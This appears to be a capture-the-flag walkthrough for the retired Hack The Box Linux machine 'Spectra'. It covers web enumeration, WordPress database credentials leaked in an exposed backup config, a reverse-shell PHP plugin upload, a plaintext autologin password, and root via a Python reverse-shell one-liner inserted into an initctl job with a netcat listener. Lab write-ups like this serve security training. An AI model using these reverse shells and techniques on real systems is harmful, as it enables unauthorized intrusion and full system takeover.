Name: Spectra
Release Date: 27 Feb 2021
Retire Date: 25 Jun 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
Westar 00 days, 00 hours, 18 mins, 24 seconds
Westar 00 days, 00 hours, 31 mins, 46 seconds
Creator: egre55
Pentest Workshop PDF: Spectra.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

The main ports to worry about here are SSH TCP 22, HTTP TCP 80, and MySQL TCP 3306. Let's start by navigating to and we get a Issue Tracker (similar to Jira) that is in place "Until IT set up the Jira we can configure and use this for issue tracking." 

Checking both links, while running Gobuster using:


gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap,php,php2,php3,php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,301,302,307" -t50 -o Spectra.out


we notice that they are both going to spectra.htb. That means we need to add spectra.htb to our /etc/hosts file using:


sudo vi /etc/hosts

i <to enter insert/edit mode> spectra.htb





and try the navigation again. This time we are greeted by the correct pages, shown below, although the "Test" page throws a database error.

It looks like the Software Issue Management system is made in WordPress. Let's run Gobuster on the /main and /testing sites, but let's also run WPScan (a WordPress scanner) and see if anything pops up.

└─$ gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-main.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bat,inc,pcap,php.bak,pl,shtml,aspx,git,html,jsa,log,sh,swf,asp,bak,jhtml,mdb,php4,php7,cgi,htm,jsp,php6,phtml,php2,
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
2022/01/24 01:30:14 Starting gobuster in directory enumeration mode
Error: error on running gobuster: unable to connect to Get "": context deadline exceeded 
(Client.Timeout exceeded while awaiting headers)
└─$ gobuster dir -k -e -r -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,
php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,
301,302,307" -t50 -o Spectra-testing.out
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:           
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              shtml,sql,css,php3,php4,php6,php.bak,sh,nsf,php5,reg,swf,
[+] Follow Redirect:         true
[+] Expanded:                true
[+] Timeout:                 10s
2022/01/24 01:30:57 Starting gobuster in directory enumeration mode
===============================================================            (Status: 500) [Size: 2646]           (Status: 200) [Size: 627]         (Status: 500) [Size: 2646]          (Status: 200) [Size: 19915]          (Status: 200) [Size: 25891]          (Status: 200) [Size: 7278]     (Status: 500) [Size: 2646]             (Status: 200) [Size: 11460]           (Status: 200) [Size: 0]        (Status: 500) [Size: 2646] 

Gobuster seems to stall and throw errors and WPScan provided no usable results, but it's clear we can list the /testing URL. However, that wp-config.php.save file looks interesting.

In the middle of all of that is a MySQL set of credentials.


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );


Going to the usual WordPress login (http://spectra.htb/main/wp-login.php), we can try using the MySQL credentials but with an Administrator username. With that, we have access to the WordPress Admin Portal!

A quick way to exploit WordPress is by uploading a malicious PHP Plugin page, usually in a ZIP format. The easiest and best way is to upload the php-reverse-shell.php from Pentest Monkey as the plugin, but we'll need the WP-Plugin headers added to it. Let's see if it works.


/* Plugin Name: WordPress Maintanance Plugin

Plugin URI: wordpress.org

Description: WordPress Maintenance Activities

Author: WordPress Version: 1.0

Author URI: wordpress.org



Zip it, Upload it, Set a netcat listener on your chosen port, and Activate the Plugin. As soon as it is activated, we have a reverse shell as nginx!

Looking around the file system, we find some interesting things in the /opt folder. There is an "autologon.conf.orig" file with another path we need to look into:


nginx@spectra /opt $ cat autologin.conf.orig
cat autologin.conf.orig
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
description   "Automatic login at boot"
author        "chromium-os-dev@chromium.org"
# After boot-complete starts, the login prompt is visible and is accepting
# input.
start on started boot-complete
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do  <<<<<<</etc/autologin is not normal
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
  if [ -z "${passwd}" ]; then
    exit 0
  # Inject keys into the login prompt.
  # For this to work, you must have already created an account on the device.
  # Otherwise, no login prompt appears at boot and the injected keys do the
  # wrong thing.
  /usr/local/sbin/inject-keys.py -s "${passwd}" -k enter
end script

nginx@spectra /opt $ cat /etc/autologin/passwd
cat /etc/autologin/passwd

We know from the /home folder there are other users, so we try SSH as katie:SummerHereWeCome!! and we are able to log in.

Now we grab the user.txt flag and perform our usual enumerations. Sudo -l and finding "developers" group files shows us our exact privesc path.

We see SEVERAL test.conf files and a nodetest.js file. Looking into that NodeJS file, we need to change the node that runs the "exec" command to a python reverse shell callback. We can do that by commenting out the exec line and add our own.


exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR TUN0 IP>",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


We have to act quickly because the test.conf file rewrites to the original pretty quickly.

Now we can run:


Attacking Machine:

nc -lvnp 1337


Victim Machine:

sudo /sbin/initctl start test


And we should get a reverse callback as Root!


# cat /root/root.txt